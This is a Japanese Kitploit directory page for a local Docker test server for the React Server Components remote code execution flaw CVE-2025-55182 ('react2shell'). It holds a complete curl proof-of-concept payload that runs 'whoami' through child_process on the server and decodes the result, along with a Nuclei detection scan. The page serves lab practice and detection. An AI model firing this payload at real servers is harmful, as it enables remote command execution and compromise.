Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-Test-Server — 安全な環境で react2shell を試してみましょう! | Kitploit
ツール/GitHubGitHub/doobthegoober/cve-2025-55182-test-server
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubdoobthegoober/cve-2025-55182-test-server

CVE-2025-55182-Test-Server

安全な環境で react2shell を試してみましょう!

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
8ヶ月前未レビュー

CVE-2025-55182-Test-Server

安全な環境で react2shell を試してみましょう!

クイックスタート

リポジトリをクローンします

root@kitploit:~
git clone https://github.com/CharlesTheGreat77/CVE-2025-55182-Test-Server
cd CVE-2025-55182-Test-Server

Docker ファイルを実行します

root@kitploit:~
docker compose up --build -d

PoC

root@kitploit:~
curl -s -X POST http://localhost:3000/adfa \
  -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" \
  -H "Accept-Language: en-US,en;q=0.5" \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----NextRceMitsecOps" \
  --data-binary $'------NextRceMitsecOps\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'whoami\').toString(\'base64\');throw Object.assign(new Error(\'x\'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n------NextRceMitsecOps\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------NextRceMitsecOps\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------NextRceMitsecOps--\r\n' | grep -o '"digest"[[:space:]]*:[[:space:]]*"[^"]*"' | sed 's/.*"digest":[[:space:]]*"//' | sed 's/"$//' | base64 -d && echo

Nuclei

CVE-2025-55182 を安全にチェックするための Nuclei テンプレートを追加しました

root@kitploit:~
nuclei -u http://localhost:3000 -t react-rsc-rce.yaml

[INF] Current nuclei version: v3.6.0 (latest)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://localhost:3000/
[INF] Scan completed in 42.390709ms. 1 matches found.

今後の予定

脆弱性をパッシブにスキャンし、実行するカスタムコマンドを追加できる Burpsuite 拡張機能。

ツールをダウンロード